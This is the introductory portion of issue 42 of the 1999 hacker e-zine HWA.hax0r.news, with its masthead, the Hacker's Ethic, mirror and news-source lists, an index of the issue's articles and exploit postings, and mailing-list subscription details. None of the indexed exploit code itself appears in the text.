[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
  [=HWA'99=]                         Number 42 Volume 1 1999 *Nov 14th 99
==========================================================================
                    [ 61:20:6B:69:64:20:63:6F:75: ]
              [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
              [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
* This issue covers Nov 7th to Nov 14th and is our 1st anniversary edition!
==========================================================================

                  © BIRTHDAY ISSUE NOV13th 1999 ©

                     "ABUSUS NON TOLLIT USUM"

==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
                    http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative.

Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution.
Its tenets are as follows:

 1 - Access to computers should be unlimited and total.
 2 - All information should be free.
 3 - Mistrust authority - promote decentralization.
 4 - Hackers should be judged by their hacking not bogus criteria such as
     degrees, age, race, or position.
 5 - You create art and beauty on a computer.
 6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls which are posted verbatim. I've decided to continue with this method
unless more people complain, the zine is best viewed in 1024x768 mode with
UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

   http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
   http://net-security.org/hwahaxornews
   http://www.sysbreakers.com/hwa
   http://www.attrition.org/hosted/hwa/
   http://www.ducktank.net/hwa/issues.html.
   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
   http://hwazine.cjb.net/
   http://www.hackunlimited.com/files/secu/papers/hwa/
   http://www.attrition.org/~modify/texts/zines/HWA/
 * http://hwa.hax0r.news.8m.com/
 * http://www.fortunecity.com/skyscraper/feature/103/

 *  Crappy free sites but they offer 20M & I need the space...
 ** Some issues are not located on these sites since they exceed the file
    size limitations imposed by the sites :-( please only use these if no
    other recourse is available.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
   http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
   http://www.attrition.org/hosted/hwa/
   http://www.attrition.org/~modify/texts/zines/HWA/
   http://www.ducktank.net/hwa/issues.html.   ** NEW **
   http://www.alldas.de/hwaidx1.htm   ** NEW ** CHECK THIS ONE OUT **
   http://www.csoft.net/~hwa/
   http://www.digitalgeeks.com/hwa.   *DOWN*
   http://members.tripod.com/~hwa_2k
   http://welcome.to/HWA.hax0r.news/
   http://www.attrition.org/~modify/texts/zines/HWA/
   http://www.projectgamma.com/archives/zines/hwa/
   http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...
@HWA

=-----------------------------------------------------------------------=
                   Welcome to HWA.hax0r.news ... #42
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...

**************************************************************************
                   Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed
***
*** please join to discuss or impart news on from the zine and around
*** the zine or just to hang out, we get some interesting visitors you
*** could be one of em.
***
*** Note that the channel isn't there to entertain you its purpose is
*** to bring together people interested and involved in the underground
*** to chat about current and recent events etc, do drop in to talk or
*** hangout. Also if you want to promo your site or send in news tips
*** its the place to be, just remember we're not #hack or #chatzone...
**************************************************************************

=--------------------------------------------------------------------------=

   The first video played on MTV was 'Video Killed The Radio Star'

=--------------------------------------------------------------------------=
  [ INDEX ]
=--------------------------------------------------------------------------=
    Key     Intros
=--------------------------------------------------------------------------=

    00.0  .. COPYRIGHTS
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
    00.2  .. SOURCES
    00.3  .. THIS IS WHO WE ARE
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
    00.5  .. THE HWA_FAQ V1.0

    ABUSUS NON TOLLIT USUM?

    This is (in case you hadn't guessed) Latin, and loosely translated
    it means "Just because something is abused, it should not be taken
    away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
    Key     Content
=--------------------------------------------------------------------------=

    01.0  .. GREETS
     01.1 .. Last minute stuff, rumours, newsbytes
     01.2 .. Mailbag
    02.0  .. From the Editor
    03.0  .. Who is Chris Buckley and why was he busted?
    04.0  .. rpc.nfsd2 exploit for Linux
    05.0  .. MSADC/RDS script v2 by rain forest puppy
    06.0  .. CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security
    07.0  .. FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security
    08.0  .. NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security
    09.0  .. FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security
    10.0  .. Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security
    11.0  .. ZOM-MAIL 1.09 Exploit/Shadow Penguin Security
    12.0  .. AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security
    13.0  .. YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
    14.0  .. Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security
    15.0  .. Exploit Translation Server Version1.00/Shadow Penguin Security
    16.0  .. Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
    17.0  .. Security Focus Newsletters #14 and 15
    18.0  .. First RealJukebox Now RealPlayer
    19.0  .. New Difficult To Kill Macro Virus Found
    20.0  .. Do the Laws of War Apply in Cyberspace?
    21.0  .. cDc Has New Trojan Plans
    22.0  .. India Set To Vote on 'CyberLaw' Bill
    23.0  .. Public Workshop to Discuss Web Site Profiling To Be Held
    24.0  .. Naval Station Upgrades Web Security
    25.0  .. Sony Reveals Addresses of 2.5 Million Subscribers
    26.0  .. TrustE to Rethink Charter
    27.0  .. Russians Exploited SIPRnet Gateways
    28.0  .. FBI Director Calls For International Cooperation on Online Crime
    29.0  .. Lebanon Outlaws Voice Over IP
    30.0  .. Bond Fans Could Not Wait?
    31.0  .. Masquerade Attack Discovered for Outlook
    32.0  .. Feds May Create Database to Steal Privacy
    33.0  .. CMU Invades Students Computers
    34.0  .. New Privacy Alerting Software
    35.0  .. CypherPunks to Host Echelon Discussion
    36.0  .. Cable And Wireless Optus Drops Legal Action Against Surfers
    37.0  .. BubbleBoy Virus Uses HTML
    38.0  .. DVD Decrypters Sued - DeCSS Labeled A 'Good Thing'
    39.0  .. Class Action Suits Brought Against RealNetworks
    40.0  .. IETF Rejects Internet Wiretapping Proposals
    41.0  .. John Vranesevich, AntiOnline, Slashdot and the Synthesis
    42.0  .. Strange Corporate Hacking Saga
    43.0  .. Bubbleboy breaks out of lab - found on net
    44.0  .. 'Fun Love' Warning Issued
    45.0  .. Simple nomad to speak at toorcon
    46.0  .. Distributed Attempt to Break 56bit CS-Cipher
    47.0  .. CallNet Admits to Security Blunder
    48.0  .. Singapore Pair Sentenced After Posting Passwords
    49.0  .. Singapore Agencies to Investigate Defacement of Government Web Site
    50.0  .. BSA Targets IRC For Piracy
    51.0  .. Law Firm Sued Over Possible Cyber Attack
    52.0  .. New E-Zine Issues Released
    53.0  .. 'Fixed' version of the new ADM-BIND exploit
    54.0  .. Current snapshot of the CYBERARMY lists. Proxies, etc

   During an average lifetime a man will spend 3550 hours removing
   8.4 meters of stubble

=--------------------------------------------------------------------------=

    AD.S  .. Post your site ads or etc here, if you can offer something
             in return thats tres cool, if not we'll consider ur ad
             anyways so send it in. ads for other zines are ok too btw
             just mention us in yours, please remember to include links
             and an email contact. Corporate ads will be considered also
             and if your company wishes to donate to or participate in
             the upcoming Canc0n99 event send in your suggestions and
             ads now...n.b date and time may be pushed back join mailing
             list for up to date information.
             Current dates: POSTPONED til further notice, place: TBA

    Ha.Ha .. Humour and puzzles

             Hey You!
             =------=
             Send in humour for this section! I need a laugh and its
             hard to find good stuff... ;)

    SITE.1 .. Featured site,
    H.W   .. Hacked Websites
    A.0   .. APPENDICES
    A.1   .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
are reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal
and send a poor guy a postcard preferably one that has some scenery from
your place of residence for my collection, I collect stamps too so you
kill two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in Bahrain,
take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

 - Photo copies of old system manual front pages (optionally signed by
   you) ;-)
 - Photos of yourself, your mom, sister, dog and or cat in a NON
   compromising position plz I don't want pr0n.
 - Picture postcards
 - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
   tapes with hack/security related archives, logs, irc logs etc on em.
 - audio or video cassettes of yourself/others etc of interesting phone
   fun or social engineering examples or transcripts thereof.

Stuff you can email:

 - Prank phone calls in .ram or .mp* format
 - Fone tones and security announcements from PBX's etc
 - fun shit you sampled off yer scanner (relevant stuff only like #2600
   meeting activities)
 - reserved for one smiley face -> :-) <-
 - PHACV lists of files that you have or phac cd's you own (we have a
   burner, *g*)
 - burns of phac cds (email first to make sure we don't already have em)
 - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
   in .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas2@usa.net

Websites;

    sAs72.......................: http://members.tripod.com/~sAs72/
    Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ..................http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
    http://www.ottawacitizen.com/business/
    http://search.yahoo.com.sg/search/news_sg?p=hack
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
    http://www.zdnet.com/zdtv/cybercrime/
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    http://freespeech.org/eua/    Electronic Underground Affiliation
    http://ech0.cjb.net           ech0 Security
    http://axon.jccc.net/hir/     Hackers Information Report
    http://net-security.org       Net Security
    http://www.403-security.org   Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete)         Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

    http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter. I will
allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

 + Information on Unix related security holes/backdoors (past and present)
 + Exploit programs, scripts or detailed processes about the above
 + Patches, workarounds, fixes
 + Announcements, advisories or warnings
 + Ideas, future plans or current works dealing with Unix security
 + Information material regarding vendor contacts and procedures
 + Individual experiences in dealing with above vendors or security
   organizations
 + Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without
your permission in any medium outside the distribution of this list may
be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below. Other than the
change of domains nothing of how the list is run changes. I am still
the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:

    BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.

As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP
(Spanish) which will be moderated by CORE SDI S.A. from Argentina
(the folks that brought you Secure Syslog and the SSH insertion
attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the
Geek Girl herself!) have moved over to Security Focus to help us with
building this new community. The other staff at Security Focus are
largely derived from long time supporters of Bugtraq and the community
in general. If you are interested in viewing the staff pages, please
see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the
  discussion of new vulnerabilities. As such I normally don't approve
  messages about break-ins, trojans, viruses, etc with the exception
  of wide spread cases (Melissa, ADM worm, etc). The other choice
  people are usually left with is email CERT but this fails to
  communicate this important information to others that may be
  potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information.
  Topical items include such things as information about rootkits
  new trojan horses and viruses, source of attacks and tell-tale
  signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
  of:

      SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of
the following:

* Vulnerabilities. We are making accessible a free vulnerability
  database. You can search it by vendor, product and keyword. You
  will find detailed information on the vulnerability and how to fix
  it, as well as links to reference information such as email messages,
  advisories and web pages. You can search by vendor, product and
  keywords. The database itself is the result of culling through 5
  years of BUGTRAQ plus countless other lists and news groups. It's
  a shining example of how thorough full disclosure has made a
  significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products
  from over two hundred different vendors.

* Services. A large and focused directory of security services offered
  by vendors.

* Books, Papers and Articles. A vast number of categorized security
  related books, papers and articles. Available to download directly
  from our servers when possible.

* Tools. A large array of free security tools. Categorized and
  available for download.

* News: A vast number of security news articles going all the way
  back to 1995.

* Security Resources: A directory to other security resources on
  the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.

Cheers.
-- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? 
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away..

Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA


00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA


